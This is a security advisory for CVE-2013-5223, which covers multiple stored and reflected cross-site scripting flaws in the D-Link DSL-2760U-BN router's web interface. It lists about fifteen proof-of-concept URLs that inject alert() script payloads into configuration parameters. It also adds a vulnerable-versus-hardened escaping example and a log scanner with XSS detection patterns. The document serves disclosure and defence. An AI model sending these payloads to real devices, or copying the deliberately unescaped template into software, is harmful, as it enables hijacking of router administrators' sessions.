D-Link DSL-2760U-BN multiple cross-site scripting and HTML Injection Vulnerabilities
Release date:
Updated on:
Affected Systems:
D-Link DSL-2760U-BN
Description:
--------------------------------------------------------------------------------
Bugtraq id: 63648
CVE (CAN) ID: CVE-2013-5223
The D-Link 2760N is a router.
Its web UI has multiple stored and reflected cross-site scripting vulnerabilities in several of its configuration pages. A successful exploit executes attacker-supplied HTML and script code in the browser of a user viewing the affected page, in the context of the router's web interface.
Source: Liad Mizrachi
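The rendering defect behind these findings, shown as an added example rather than the firmware's own code: a constructed page template copies a stored configuration value unescaped into an HTML attribute and into a JavaScript string literal (the two contexts the PoC payloads target), beside the same template with escaping chosen per output context. The field names, the template and the idea that the UI emits both contexts are assumptions; the two payloads are taken from the PoC list.

```python
import html
import json

def js_string_literal(value: str) -> str:
    """Encode value as a JavaScript string literal that can neither close the
    quotes nor terminate the enclosing <script> element. json.dumps escapes
    quotes, backslashes, control characters and U+2028/2029; the extra
    replacements neutralise '<' and '>' so '</script>' can never appear."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")

def render_vulnerable(name: str, value: str) -> str:
    """Constructed stand-in for the affected pages: the stored value is copied
    verbatim into an HTML attribute and into a JS string literal, so both a
    '<script>...' payload and a '"; alert(...);//' breakout execute."""
    return (
        f'<input name="{name}" value="{value}">\n'
        f'<script>var {name} = "{value}";</script>'
    )

def render_hardened(name: str, value: str) -> str:
    """Same template with context-specific escaping: HTML entity encoding
    (quotes included) for the attribute, a neutralised JS literal for the
    script block. `name` is assumed to be a fixed identifier from the
    template, not user input."""
    return (
        f'<input name="{html.escape(name)}" value="{html.escape(value)}">\n'
        f'<script>var {name} = {js_string_literal(value)};</script>'
    )

# Payloads from the PoC list (wireless SSID and printer-name cases).
SSID_PAYLOAD = "<script>alert('XSSID')</script>"
PRINTER_PAYLOAD = 'aa"; alert(\'xss-Printer-Sever\');//'

if __name__ == "__main__":
    for field, payload in (("wlSsid", SSID_PAYLOAD), ("ippName", PRINTER_PAYLOAD)):
        print("--- vulnerable ---")
        print(render_vulnerable(field, payload))
        print("--- hardened ---")
        print(render_hardened(field, payload))
```

The point of `js_string_literal` is that HTML escaping alone does not help inside a `<script>` block: there the browser's HTML parser only looks for `</script`, and the JavaScript parser only cares about the quote character, so the value has to be encoded for the JavaScript context first and the `</` sequence removed on top of that.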
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk.
======================================
PoC
======================================
1) ets Settings
http://www.example.com/sntpcfg.cgi?ntp_enabled=1&ntpServer1=locahost%22;alert%28%27XSS%27%29;//&ntpServer2=time-nw.nist.gov&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=+&timezone=Jerusalem&use_dst=0
2) Dynamic DNS (Reflected/Stored)
http://www.example.com/ddnsmngr.cmd?action=add&service=1&hostname=aaaa&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=zzzzzz&iface=ppp0
3) Parental Control
http://www.example.com/todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&mac=f1:de:f1:AB:cb:6d&days=1&start_time=571&end_time=732
4) URL Filtering
http://www.example.com/urlfilter.cmd?action=set_url&TodUrlAdd=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&port_num=80
5) NAT-Port Triggering
http://www.example.com/scprttrg.cmd?action=add&appName=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&dstWanIf=ppp0&tStart=1111,&tEnd=1112,&tProto=1,&oStart=11,&oEnd=11,&oProto=1,
6) IP Filtering:
http://www.example.com/scoutflt.cmd?action=add&fltName=<script>alert('xss')</script>&protocol=1&srcAddr=10.0.0.10&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.12&dstMask=255.255.255.0&dstPort=8080
7) IP Filtering-Removal Error:
http://www.example.com/scoutflt.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
8) Interface Grouping (also reflected on "Local Area Network (LAN) Setup "):
http://www.example.com/portmapcfg.cmd?action=add&groupName=<Script>alert('xss')</script>&choiceBox=|usb0|wl0|&wanIfName=atm1
9) SNMP
http://www.example.com/snmpconfig.cgi?snmpStatus=1&snmpRoCommunity=%27;alert(%27XSS%27)&snmpRwCommunity=private&snmpSysName=D-LINK&snmpSysContact=unknown&snmpSysLocation=unknown&snmpTrapIp=0.0.0
10) Incoming IP Filter:
http://www.example.com/scinflt.cmd?action=add&wanIf=ppp0&fltName=<script>alert('xss&protocol=2&srcAddr=ss')</script>&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.10&dstMask=255.255.255.0&dstPort=8080
11) Policy Routing Add:
http://www.example.com/prmngr.cmd?action=add&PolicyName=<script>alert('x&SourceIp=ss');</script>&lanIfcName=wl0&wanIf=ppp0&defaultgw=10.0.0.111
12) Policy Routing-Removal Error:
http://www.example.com/prmngr.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
13) Printer Server
http://www.example.com/ippcfg.cmd?action=savapply&ippEnabled=1&ippMake=aa&ippName=aa";alert('xss-Printer-Sever');//
14) SAMBA Configuration
http://www.example.com/samba.cgi?enableSmb=1&smbNetBiosName=';var x="XSS";//&smbDirName=B';alert(x);//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
OR
http://www.example.com/samba.cgi?enableSmb=1&smbNetBiosName=';alert("SAMBA-X&smbDirName=SS");//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
15) WiFi SSID
Step 1 (store the XSS payload as the wireless SSID):
http://www.example.com/wlcfg.wl?wlSsidIdx=0&wlEnbl=1&wlHide=0&wlAPIsolation=0&wlSsid=%3CScript%3Ealert(%27XSSID%27)%3C/script%3E&wlCountry=IL&wlMaxAssoc=16&wlDisableWme=0&wlEnableWmf=0&Strong=0&wlSsid_wl0v1=wl0_Guest1&Strong=0&Strong=0&strong=0&bandwidth=0&bandwidth=16&wlEnbl_wl0v2=0&wlSsid_wl0v2=wl0_Guest2&bandwidth=0&bandwidth=0&bandwidth=0&bandwidth=0&bandwidth=16&wlEnbl_wl0v3=0&wlSsid_wl0v3=wl0_Guest3&wlHide_wl0v3=0&wlAPIsolation_wl0v3=0&Signature=0&wlEnableWmf_wl0v3=0&Signature=16
Step 2:
Go to Wireless -> Security [http://www.example.com/wlsecurity.html]
OR
Go to Wireless -> MAC Filter [http://www.example.com/wlmacflt.cmd?action=view]
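A defender-side check over requests of the kind listed above, as an added example that is not part of the advisory: it parses constructed access-log lines from a proxy or IDS placed in front of the router (the device itself is not assumed to keep such a log), URL-decodes each query parameter repeatedly so double encoding does not hide a payload, and flags values carrying a script element, an `alert(` call or a quote-then-semicolon string breakout when the request targets one of the management endpoints named in the PoC list. The endpoint set comes from the list above; the log format, the sample lines and the indicator patterns are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Management endpoints named in the PoC list above (path component only).
AFFECTED_ENDPOINTS = {
    "/sntpcfg.cgi", "/ddnsmngr.cmd", "/todmngr.tod", "/urlfilter.cmd",
    "/scprttrg.cmd", "/scoutflt.cmd", "/portmapcfg.cmd", "/snmpconfig.cgi",
    "/scinflt.cmd", "/prmngr.cmd", "/ippcfg.cmd", "/samba.cgi", "/wlcfg.wl",
}

# Coarse indicators covering the three payload shapes used in the PoCs:
# a script element, a JavaScript call, and a quote-then-semicolon breakout
# from a JS string literal. Expect some false positives on free-text fields.
INDICATORS = (
    re.compile(r"<\s*/?\s*script\b", re.I),
    re.compile(r"\balert\s*\(", re.I),
    re.compile(r"""['"]\s*;"""),
)

# Constructed common-log-format line: client, idents, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode until the value stops changing (bounded), so a double-encoded
    %253Cscript%253E is seen as <script> just like a single-encoded one."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target: str) -> list:
    """Return (endpoint, parameter) pairs whose decoded value matches an indicator.
    The query is split on '&' only, so a literal ';' inside a payload stays in the value."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if path not in AFFECTED_ENDPOINTS:
        return []
    hits = []
    for pair in parts.query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        if any(p.search(value) for p in INDICATORS):
            hits.append((path, name))
    return hits

def scan_log(lines) -> list:
    """Return (client, endpoint, parameter) for every flagged request in the log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for endpoint, param in inspect_request(m.group("target")):
            findings.append((m.group("src"), endpoint, param))
    return findings

# Constructed sample lines: two carry PoC-style payloads, two are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Nov/2013:10:01:02 +0200] "GET /ddnsmngr.cmd?action=add&service=1&hostname=aaaa'
    '&username=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E&password=zzzzzz&iface=ppp0 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Nov/2013:10:01:10 +0200] "GET /snmpconfig.cgi?snmpStatus=1'
    '&snmpRoCommunity=%27;alert(%27XSS%27)&snmpRwCommunity=private HTTP/1.1" 200 300',
    '10.0.0.9 - - [12/Nov/2013:10:02:00 +0200] "GET /ddnsmngr.cmd?action=add&service=1&hostname=home'
    '&username=bob&password=zzzzzz&iface=ppp0 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Nov/2013:10:02:30 +0200] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, endpoint, param in scan_log(SAMPLE_LOG):
        print(f"suspicious request from {client}: {endpoint} parameter {param!r}")
```

Because several of the PoCs are stored rather than reflected, a single flagged request is worth treating as a configuration change to review on the device (SSID, DDNS user name, filter names and so on), not only as a blocked attempt: the payload may already be persisted and will fire for the next administrator who opens the page.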
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
At the time of writing, the vendor has not released a patch or firmware upgrade. Users of this product should watch the vendor's homepage for an updated version:
http://www.dlink.com/
http://www.dlink.com.tr/en/arts/117.html
http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdf